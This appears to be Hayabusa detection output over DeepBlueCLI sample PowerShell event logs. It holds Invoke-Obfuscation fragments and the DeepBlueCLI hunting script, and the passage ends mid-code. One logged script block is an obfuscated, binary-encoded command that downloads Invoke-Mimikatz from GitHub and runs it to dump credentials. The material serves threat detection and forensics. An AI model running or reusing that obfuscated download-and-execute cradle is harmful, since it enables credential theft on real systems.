$Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:54.000 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:54.036 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:54.050 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:56.644 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:56.651 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:56.696 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:09.115 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"-join('1001001n1000101-1011000g100000<101000e1001110F1100101-1110111@101101<1001111i1100010i1101010n1100101n1100011e1110100@100000-1001110n1100101n1110100n101110e1010111n1100101;1100010<1000011F1101100{1101001-1100101-1101110-1110100i101001<101110-1000100-1101111<1110111F1101110;1101100n1101111i1100001e1100100{1010011;1110100<1110010@1101001i1101110i1100111{101000e100111e1101000@1110100e1110100g1110000g1110011-111010-101111;101111;1110010@1100001@1110111-101110;1100111{1101001F1110100-1101000@1110101{1100010e1110101n1110011@1100101i1110010-1100011i1101111n1101110e1110100i1100101;1101110@1110100n101110i1100011<1101111n1101101-101111n1101101@1100001<1110100i1110100-1101001{1100110;1100101i1110011-1110100F1100001n1110100{1101001@1101111F1101110e101111-1010000<1101111e1110111{1100101e1110010;1010011i1110000n1101100@1101111F1101001e1110100i101111n1101101-1100001;1110011<1110100i1100101<1110010i101111<1000101;1111000;1100110-1101001-1101100<1110100;1110010F1100001<1110100{1101001@1101111n1101110i101111g1001001e1101110<1110110{1101111F1101011n1100101{101101@1001101-1101001{1101101i1101001n1101011n1100001-1110100;1111010<101110-1110000e1110011g110001e100111-101001;111011F100000@1001001{1101110g1110110{1101111i1101011F1100101-101101n1001101g1101001e1101101@1101001-1101011{1100001-1110100{1111010@100000g101101;1000100-1110101g1101101g1110000F1000011g1110010n1100101;1100100<1110011'.splIT( '<{genF-i;@' )| FOreAcH { ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) })| &( ([STRinG]$VerBosEPREfereNce)[1,3]+'x'-jOiN'')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:09.116 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:33.244 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.464 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) 